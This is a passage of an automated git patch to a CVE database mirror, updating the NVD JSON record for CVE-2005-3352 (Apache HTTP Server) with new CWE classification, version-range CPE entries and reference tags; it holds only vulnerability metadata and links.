From 13b8c98c4d358340add3e9ecc3f3a44ce9c9e0d5 Mon Sep 17 00:00:00 2001 From: cad-safe-bot Date: Fri, 19 Jan 2024 17:00:29 +0000 Subject: [PATCH] Auto-Update: 2024-01-19T17:00:25.391679+00:00 --- CVE-2005/CVE-2005-33xx/CVE-2005-3352.json | 816 ++++++++------------ CVE-2007/CVE-2007-44xx/CVE-2007-4465.json | 6 +- CVE-2008/CVE-2008-29xx/CVE-2008-2939.json | 374 ++++++--- CVE-2021/CVE-2021-245xx/CVE-2021-24567.json | 69 +- CVE-2021/CVE-2021-248xx/CVE-2021-24869.json | 74 +- CVE-2021/CVE-2021-248xx/CVE-2021-24870.json | 74 +- CVE-2021/CVE-2021-251xx/CVE-2021-25117.json | 69 +- CVE-2021/CVE-2021-42xx/CVE-2021-4227.json | 69 +- CVE-2022/CVE-2022-236xx/CVE-2022-23633.json | 8 +- CVE-2022/CVE-2022-407xx/CVE-2022-40700.json | 111 +++ CVE-2022/CVE-2022-428xx/CVE-2022-42889.json | 10 +- CVE-2022/CVE-2022-450xx/CVE-2022-45083.json | 55 ++ CVE-2022/CVE-2022-458xx/CVE-2022-45845.json | 55 ++ CVE-2022/CVE-2022-471xx/CVE-2022-47160.json | 55 ++ CVE-2022/CVE-2022-486xx/CVE-2022-48619.json | 70 +- CVE-2023/CVE-2023-20xx/CVE-2023-2007.json | 6 +- CVE-2023/CVE-2023-212xx/CVE-2023-21255.json | 8 +- CVE-2023/CVE-2023-214xx/CVE-2023-21400.json | 8 +- CVE-2023/CVE-2023-271xx/CVE-2023-27168.json | 4 +- CVE-2023/CVE-2023-323xx/CVE-2023-32337.json | 8 +- CVE-2023/CVE-2023-380xx/CVE-2023-38003.json | 8 +- CVE-2023/CVE-2023-387xx/CVE-2023-38727.json | 8 +- CVE-2023/CVE-2023-406xx/CVE-2023-40687.json | 8 +- CVE-2023/CVE-2023-406xx/CVE-2023-40692.json | 8 +- CVE-2023/CVE-2023-421xx/CVE-2023-42134.json | 113 ++- CVE-2023/CVE-2023-421xx/CVE-2023-42135.json | 113 ++- CVE-2023/CVE-2023-421xx/CVE-2023-42136.json | 281 ++++++- CVE-2023/CVE-2023-421xx/CVE-2023-42137.json | 281 ++++++- CVE-2023/CVE-2023-439xx/CVE-2023-43985.json | 4 +- CVE-2023/CVE-2023-441xx/CVE-2023-44112.json | 101 ++- CVE-2023/CVE-2023-441xx/CVE-2023-44117.json | 81 +- CVE-2023/CVE-2023-45xx/CVE-2023-4566.json | 81 +- CVE-2023/CVE-2023-462xx/CVE-2023-46219.json | 6 +- CVE-2023/CVE-2023-463xx/CVE-2023-46351.json | 4 +- CVE-2023/CVE-2023-477xx/CVE-2023-47701.json | 8 +- CVE-2023/CVE-2023-477xx/CVE-2023-47718.json | 8 +- CVE-2023/CVE-2023-48xx/CVE-2023-4818.json | 89 ++- CVE-2023/CVE-2023-492xx/CVE-2023-49285.json | 6 +- CVE-2023/CVE-2023-492xx/CVE-2023-49286.json | 6 +- CVE-2023/CVE-2023-492xx/CVE-2023-49288.json | 6 +- CVE-2023/CVE-2023-500xx/CVE-2023-50028.json | 4 +- CVE-2023/CVE-2023-500xx/CVE-2023-50030.json | 4 +- CVE-2023/CVE-2023-501xx/CVE-2023-50123.json | 64 +- CVE-2023/CVE-2023-501xx/CVE-2023-50125.json | 63 +- CVE-2023/CVE-2023-501xx/CVE-2023-50128.json | 68 +- CVE-2023/CVE-2023-502xx/CVE-2023-50269.json | 6 +- CVE-2023/CVE-2023-504xx/CVE-2023-50495.json | 8 +- CVE-2023/CVE-2023-509xx/CVE-2023-50963.json | 8 +- CVE-2023/CVE-2023-510xx/CVE-2023-51062.json | 68 +- CVE-2023/CVE-2023-510xx/CVE-2023-51064.json | 68 +- CVE-2023/CVE-2023-510xx/CVE-2023-51065.json | 68 +- CVE-2023/CVE-2023-510xx/CVE-2023-51066.json | 68 +- CVE-2023/CVE-2023-510xx/CVE-2023-51070.json | 68 +- CVE-2023/CVE-2023-510xx/CVE-2023-51071.json | 68 +- CVE-2023/CVE-2023-519xx/CVE-2023-51946.json | 4 +- CVE-2023/CVE-2023-519xx/CVE-2023-51947.json | 4 +- CVE-2023/CVE-2023-519xx/CVE-2023-51948.json | 4 +- CVE-2023/CVE-2023-521xx/CVE-2023-52109.json | 81 +- CVE-2023/CVE-2023-55xx/CVE-2023-5528.json | 8 +- CVE-2023/CVE-2023-57xx/CVE-2023-5716.json | 8 +- CVE-2023/CVE-2023-58xx/CVE-2023-5868.json | 6 +- CVE-2023/CVE-2023-58xx/CVE-2023-5869.json | 6 +- CVE-2023/CVE-2023-58xx/CVE-2023-5870.json | 6 +- CVE-2023/CVE-2023-62xx/CVE-2023-6277.json | 6 +- CVE-2024/CVE-2024-03xx/CVE-2024-0318.json | 46 +- CVE-2024/CVE-2024-07xx/CVE-2024-0705.json | 8 +- CVE-2024/CVE-2024-07xx/CVE-2024-0712.json | 4 +- CVE-2024/CVE-2024-07xx/CVE-2024-0713.json | 4 +- CVE-2024/CVE-2024-07xx/CVE-2024-0714.json | 84 ++ CVE-2024/CVE-2024-07xx/CVE-2024-0716.json | 88 +++ CVE-2024/CVE-2024-07xx/CVE-2024-0717.json | 88 +++ CVE-2024/CVE-2024-07xx/CVE-2024-0718.json | 88 +++ CVE-2024/CVE-2024-07xx/CVE-2024-0720.json | 88 +++ CVE-2024/CVE-2024-07xx/CVE-2024-0721.json | 88 +++ CVE-2024/CVE-2024-217xx/CVE-2024-21733.json | 4 +- CVE-2024/CVE-2024-225xx/CVE-2024-22562.json | 20 + CVE-2024/CVE-2024-225xx/CVE-2024-22563.json | 20 + CVE-2024/CVE-2024-228xx/CVE-2024-22876.json | 4 +- CVE-2024/CVE-2024-228xx/CVE-2024-22877.json | 4 +- CVE-2024/CVE-2024-229xx/CVE-2024-22920.json | 20 + CVE-2024/CVE-2024-233xx/CVE-2024-23387.json | 8 +- CVE-2024/CVE-2024-236xx/CVE-2024-23659.json | 8 +- README.md | 85 +- 83 files changed, 3887 insertions(+), 807 deletions(-) create mode 100644 CVE-2022/CVE-2022-407xx/CVE-2022-40700.json create mode 100644 CVE-2022/CVE-2022-450xx/CVE-2022-45083.json create mode 100644 CVE-2022/CVE-2022-458xx/CVE-2022-45845.json create mode 100644 CVE-2022/CVE-2022-471xx/CVE-2022-47160.json create mode 100644 CVE-2024/CVE-2024-07xx/CVE-2024-0714.json create mode 100644 CVE-2024/CVE-2024-07xx/CVE-2024-0716.json create mode 100644 CVE-2024/CVE-2024-07xx/CVE-2024-0717.json create mode 100644 CVE-2024/CVE-2024-07xx/CVE-2024-0718.json create mode 100644 CVE-2024/CVE-2024-07xx/CVE-2024-0720.json create mode 100644 CVE-2024/CVE-2024-07xx/CVE-2024-0721.json create mode 100644 CVE-2024/CVE-2024-225xx/CVE-2024-22562.json create mode 100644 CVE-2024/CVE-2024-225xx/CVE-2024-22563.json create mode 100644 CVE-2024/CVE-2024-229xx/CVE-2024-22920.json diff --git a/CVE-2005/CVE-2005-33xx/CVE-2005-3352.json b/CVE-2005/CVE-2005-33xx/CVE-2005-3352.json index 24816a9be06..f5a3be4c80d 100644 --- a/CVE-2005/CVE-2005-33xx/CVE-2005-3352.json +++ b/CVE-2005/CVE-2005-33xx/CVE-2005-3352.json @@ -2,8 +2,8 @@ "id": "CVE-2005-3352", "sourceIdentifier": "secalert@redhat.com", "published": "2005-12-13T20:03:00.000", - "lastModified": "2023-11-07T01:57:50.197", - "vulnStatus": "Modified", + "lastModified": "2024-01-19T15:12:24.063", + "vulnStatus": "Analyzed", "descriptions": [ { "lang": "en", @@ -44,7 +44,7 @@ "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, - "userInteractionRequired": false + "userInteractionRequired": true } ] }, @@ -55,7 +55,7 @@ "description": [ { "lang": "en", - "value": "NVD-CWE-Other" + "value": "CWE-79" } ] } @@ -69,403 +69,21 @@ "cpeMatch": [ { "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3:*:*:*:*:*:*:*", - "matchCriteriaId": "28EC1F94-04F3-490A-8324-1EB60EEBAD4B" + "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", + "versionEndExcluding": "1.3.35", + "matchCriteriaId": "389EC30E-F3B0-46AF-8130-546886042780" }, { "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.0:*:*:*:*:*:*:*", - "matchCriteriaId": "D9B12229-3F9E-469C-8AD6-7E43FA45B876" + "criteria": "cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*", + "versionStartIncluding": "2.0", + "versionEndExcluding": "2.0.56", + "matchCriteriaId": "6FAFA4DB-88A2-4F63-8E9D-17DAC2DD94E8" }, { "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.1:*:*:*:*:*:*:*", - "matchCriteriaId": "30D94958-0D13-4076-B6F0-61D505136789" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.2:*:*:*:*:*:*:*", - "matchCriteriaId": "691D7D29-420E-4ABC-844F-D5DD401598F1" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.3:*:*:*:*:*:*:*", - "matchCriteriaId": "B22DA22E-54DA-46CF-B3AE-4B0900D8086A" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.4:*:*:*:*:*:*:*", - "matchCriteriaId": "F90F496A-5D57-448F-A46F-E15F06CBFD01" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.5:*:*:*:*:*:*:*", - "matchCriteriaId": "1EC3D727-F7C1-4CA1-BBF4-9A38BD3B052F" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.6:*:*:*:*:*:*:*", - "matchCriteriaId": "89B58983-633F-4D20-80AE-8E7EB865CF83" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.7:*:*:*:*:*:*:*", - "matchCriteriaId": "EB2EC909-197D-4509-9D89-374D89BBBA26" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.7:*:dev:*:*:*:*:*", - "matchCriteriaId": "34FD94C9-2352-4147-9BF2-A3CF841A159B" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.8:*:*:*:*:*:*:*", - "matchCriteriaId": "96E2083D-E7EC-49D1-A870-7F0B0AF0F614" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.9:*:*:*:*:*:*:*", - "matchCriteriaId": "19C8989C-D8A6-4AE9-99B6-F2DAE5999EB6" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.10:*:*:*:*:*:*:*", - "matchCriteriaId": "F715F8CB-A473-4374-8CF1-E9D74EBA5E8F" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.11:*:*:*:*:*:*:*", - "matchCriteriaId": "7B6EE0E2-D608-4E72-A0E5-F407511405C2" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.11:*:win32:*:*:*:*:*", - "matchCriteriaId": "5E3B21AE-B167-4E49-AC32-537DCAABAB33" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.12:*:*:*:*:*:*:*", - "matchCriteriaId": "33FD6791-3B84-40CA-BCF4-B5637B172F2A" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.12:*:win32:*:*:*:*:*", - "matchCriteriaId": "F9778DCA-00B3-4C15-B1B7-05738CD61E62" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.13:*:*:*:*:*:*:*", - "matchCriteriaId": "06F447C8-15FE-44DE-86AD-5E2D496AB2A6" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.13:*:win32:*:*:*:*:*", - "matchCriteriaId": "FFD2EDEA-7D8C-4E34-AEF8-C0B64DD57152" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.14:*:*:*:*:*:*:*", - "matchCriteriaId": "6DDD2F69-CFD4-4DEA-B43A-1337EEFA95A3" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.14:*:mac_os:*:*:*:*:*", - "matchCriteriaId": "09281569-5A96-4293-9ACB-2CFD3E917FCB" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.14:*:win32:*:*:*:*:*", - "matchCriteriaId": "14E06755-5DEB-450C-A718-D1531E9986F4" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.15:*:*:*:*:*:*:*", - "matchCriteriaId": "A4955E57-9C5D-40C2-BD5F-A383FF3C33FB" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.15:*:win32:*:*:*:*:*", - "matchCriteriaId": "8F572870-41BF-40B5-B202-136449814A2D" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.16:*:*:*:*:*:*:*", - "matchCriteriaId": "6A7607F8-6C2A-4976-A861-3BEE1F45002B" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.16:*:win32:*:*:*:*:*", - "matchCriteriaId": "E593B74E-894C-4286-8F41-69C3435D9F2B" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.17:*:*:*:*:*:*:*", - "matchCriteriaId": "0A80B17D-FD66-40BD-9ADC-FE7A3944A696" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.17:*:win32:*:*:*:*:*", - "matchCriteriaId": "780FEC59-8720-4C81-8924-F25577633B24" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.18:*:*:*:*:*:*:*", - "matchCriteriaId": "713ADED4-CBE5-40C3-A128-99CFABF24560" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.18:*:win32:*:*:*:*:*", - "matchCriteriaId": "A6938AFA-D836-4F85-9595-27799D476F0A" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.19:*:*:*:*:*:*:*", - "matchCriteriaId": "70FA0B8E-1A90-4939-871A-38B9E93BCCC1" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.19:*:win32:*:*:*:*:*", - "matchCriteriaId": "46B27279-DB34-4B9C-A84C-3ED872A43599" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.20:*:*:*:*:*:*:*", - "matchCriteriaId": "83BDEAE5-29B9-48E3-93FA-F30832044C9A" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.20:*:win32:*:*:*:*:*", - "matchCriteriaId": "3F8DACCB-5DE4-4ED5-B277-7CF262FF4E68" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.22:*:*:*:*:*:*:*", - "matchCriteriaId": "A2720E06-1B0E-4BFE-8C85-A17E597BB151" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.22:*:win32:*:*:*:*:*", - "matchCriteriaId": "98477E82-3EF0-4DBB-B40D-6AD620EE4220" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.23:*:*:*:*:*:*:*", - "matchCriteriaId": "3EE1DECF-36C7-4968-8B7A-7A2034C2A957" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.23:*:win32:*:*:*:*:*", - "matchCriteriaId": "29BC4A8B-B4E9-40E7-83EE-E00F83033019" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.24:*:*:*:*:*:*:*", - "matchCriteriaId": "B67BD173-8517-4E97-BC65-D9657C63601A" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.24:*:win32:*:*:*:*:*", - "matchCriteriaId": "5352DB14-3DE4-4A3B-BB1A-AD287F6CB4C5" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.25:*:*:*:*:*:*:*", - "matchCriteriaId": "B392A96F-FD2F-4073-8EED-EB31E1F20FE4" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.25:*:win32:*:*:*:*:*", - "matchCriteriaId": "A9B53062-64C4-4E29-943D-2D5D5463E31F" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.26:*:*:*:*:*:*:*", - "matchCriteriaId": "E130104B-86F5-411E-8AC0-9B4B780BCA00" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.26:*:win32:*:*:*:*:*", - "matchCriteriaId": "83841318-8B3E-4F9B-87EA-5B0FBA488822" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.27:*:*:*:*:*:*:*", - "matchCriteriaId": "0E62E621-74DA-4D99-A79C-AD2B85896A2B" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.28:*:*:*:*:*:*:*", - "matchCriteriaId": "2C577188-BD56-4571-A61A-1684DC9E9DD9" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.29:*:*:*:*:*:*:*", - "matchCriteriaId": "5B3A4CD9-1E96-4D3B-938D-F2D15855B0DD" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.30:*:*:*:*:*:*:*", - "matchCriteriaId": "65AD2A8B-2BCA-4CE5-A03C-BFC07DF52EDC" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.31:*:*:*:*:*:*:*", - "matchCriteriaId": "4058CE14-1CC8-42FD-A6BD-6869C1610E57" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:1.3.32:*:*:*:*:*:*:*", - "matchCriteriaId": "0716E399-A5FE-4C49-BC48-CD97C03997A7" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0:*:*:*:*:*:*:*", - "matchCriteriaId": "163A6EF6-7D3F-4B1F-9E03-A8C86562CC3D" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.9:*:*:*:*:*:*:*", - "matchCriteriaId": "154566FB-0D1A-4DC2-AFE6-49DE93850951" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.28:*:*:*:*:*:*:*", - "matchCriteriaId": "EB477AFB-EA39-4892-B772-586CF6D2D235" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.28:beta:*:*:*:*:*:*", - "matchCriteriaId": "5C4962BB-0E61-4788-B582-21F05CD33AD3" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.28:beta:win32:*:*:*:*:*", - "matchCriteriaId": "BBD08D4C-3C73-4AAE-8343-BBE487CF6040" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.32:*:*:*:*:*:*:*", - "matchCriteriaId": "B35906CD-038E-4243-8A95-F0A3A43F06F7" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.32:beta:win32:*:*:*:*:*", - "matchCriteriaId": "F88372A5-FDF3-4B75-BB4C-8D9C9E8AD850" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.34:beta:win32:*:*:*:*:*", - "matchCriteriaId": "432DA9CE-EB82-406B-AD23-FD565E6C91BB" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.35:*:*:*:*:*:*:*", - "matchCriteriaId": "B940BB85-03F5-46D7-8DC9-2E1E228D3D98" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.36:*:*:*:*:*:*:*", - "matchCriteriaId": "82139FFA-2779-4732-AFA5-4E6E19775899" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.37:*:*:*:*:*:*:*", - "matchCriteriaId": "B7F717E6-BACD-4C8A-A9C5-516ADA6FEE6C" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.38:*:*:*:*:*:*:*", - "matchCriteriaId": "08AB120B-2FEC-4EB3-9777-135D81E809AA" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.39:*:*:*:*:*:*:*", - "matchCriteriaId": "1C7FF669-12E0-4A73-BBA7-250D109148C5" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.40:*:*:*:*:*:*:*", - "matchCriteriaId": "5AB7B1F1-7202-445D-9F96-135DC0AFB1E9" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.41:*:*:*:*:*:*:*", - "matchCriteriaId": "BCB7EE53-187E-40A9-9865-0F3EDA2B5A4C" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.42:*:*:*:*:*:*:*", - "matchCriteriaId": "9D06AE8A-9BA8-4AA8-ACEA-326CD001E879" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.43:*:*:*:*:*:*:*", - "matchCriteriaId": "2FC1A04B-0466-48AD-89F3-1F2EF1DEBE6A" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.44:*:*:*:*:*:*:*", - "matchCriteriaId": "19F34D08-430E-4331-A27D-667149425176" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.45:*:*:*:*:*:*:*", - "matchCriteriaId": "248BDF2C-3E78-49D1-BD9C-60C09A441724" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.46:*:*:*:*:*:*:*", - "matchCriteriaId": "BB0FDE3D-1509-4375-8703-0D174D70B22E" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.47:*:*:*:*:*:*:*", - "matchCriteriaId": "AFE732B5-00C9-4443-97E0-1DF21475C26B" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.48:*:*:*:*:*:*:*", - "matchCriteriaId": "C79C41D3-6894-4F2D-B8F8-82AB4780A824" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.49:*:*:*:*:*:*:*", - "matchCriteriaId": "449A5647-CEA6-4314-9DB8-D086F388E1C7" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.50:*:*:*:*:*:*:*", - "matchCriteriaId": "B5A407B7-F432-48F0-916A-A49952F85CA6" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.51:*:*:*:*:*:*:*", - "matchCriteriaId": "6B5AC769-D07D-43C7-B252-A5A812E7D58C" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.52:*:*:*:*:*:*:*", - "matchCriteriaId": "ADF4DBF6-DAF0-47E7-863B-C48DB7149A78" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.53:*:*:*:*:*:*:*", - "matchCriteriaId": "F2F19D71-0A58-4B03-B351-596EB67ECF80" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.54:*:*:*:*:*:*:*", - "matchCriteriaId": "5EBB3FF9-CF5A-4E7B-ACE3-A198343AD485" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:http_server:2.0.55:*:*:*:*:*:*:*", - "matchCriteriaId": "D721FFB5-D6D3-4F60-8B09-B3AD07EE6D4D" - }, - { - "vulnerable": true, - "criteria": "cpe:2.3:a:apache:mod_imap:*:*:*:*:*:*:*:*", - "matchCriteriaId": "47AD8ACC-C01F-4ED3-B0EF-E34E67F714EB" + "criteria": "cpe:2.3:a:apache:http_server:2.2:*:*:*:*:*:*:*", + "matchCriteriaId": "ACBC75F8-C1AF-45AE-91BA-5670EF2D0DCD" } ] } @@ -475,333 +93,581 @@ "references": [ { "url": "ftp://patches.sgi.com/support/free/security/advisories/20060101-01-U", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://docs.info.apple.com/article.html?artnum=307562", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01428449", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://issues.apache.org/bugzilla/show_bug.cgi?id=37874", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Issue Tracking" + ] }, { "url": "http://lists.apple.com/archives/security-announce/2008//May/msg00001.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Mailing List" + ] }, { "url": "http://lists.apple.com/archives/security-announce/2008/Mar/msg00001.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Mailing List" + ] }, { "url": "http://lists.suse.com/archive/suse-security-announce/2007-May/0005.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://lists.suse.de/archive/suse-security-announce/2006-Feb/0008.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://marc.info/?l=bugtraq&m=130497311408250&w=2", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Mailing List", + "Third Party Advisory" + ] }, { "url": "http://rhn.redhat.com/errata/RHSA-2006-0159.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://rhn.redhat.com/errata/RHSA-2006-0692.html", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Broken Link" + ] }, { "url": "http://secunia.com/advisories/17319", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable", + "URL Repurposed" + ] }, { "url": "http://secunia.com/advisories/18008", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18333", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18339", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18340", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18429", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18517", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18526", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18585", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/18743", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/19012", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/20046", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/20670", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable" + ] }, { "url": "http://secunia.com/advisories/21744", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Not Applicable", + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/22140", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/22368", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/22388", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/22669", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/23260", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/25239", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/29420", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/29849", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://secunia.com/advisories/30430", - "source": "secalert@redhat.com" + "source": "secalert@redhat.com", + "tags": [ + "Third Party Advisory" + ] }, { "url": "http://securitytracker.com/id?1015344", "source": "secalert@redhat.com", "tags": [ - "Patch" + "Patch", + "Third Party Advisory", + "VDB Entry" ] }, { "url": 